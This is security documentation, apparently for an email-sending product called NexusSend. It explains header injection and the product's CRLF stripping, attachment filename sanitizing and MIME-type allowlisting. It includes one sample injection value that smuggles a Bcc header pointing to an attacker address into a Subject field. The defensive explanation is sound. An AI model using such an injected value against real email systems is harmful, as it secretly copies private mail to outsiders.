What is header injection
Email headers are newline-delimited. A Subject value of Hello\r\nBcc: attacker@evil.com would silently add a Bcc header to every email sent through a naive implementation. This is a header injection attack, and it's been exploited in production email systems for decades.
The attack surface is any user-controlled string that ends up in an email header: subject lines, reply-to addresses, custom headers, and attachment filenames.
CRLF sanitization
NexusSend's MIME builder strips all CR (\r) and LF (\n) characters from every header value before encoding. This is applied to subject, from, to, cc, bcc, reply-to, and any custom header field.
The sanitization happens at the MIME assembly layer, not at the input validation layer. This means even if a value passes Zod validation, it is still sanitized before it touches the wire. Defense in depth.
Attachment safety
Attachment filenames are sanitized by removing surrounding quotes and stripping control characters. Content-Type values are validated against an allowlist of safe MIME types — arbitrary content types are rejected before the MIME tree is assembled.
File size is validated client-side for UX and server-side for enforcement. Base64 encoding is validated for format correctness before the payload is passed to the Gmail API.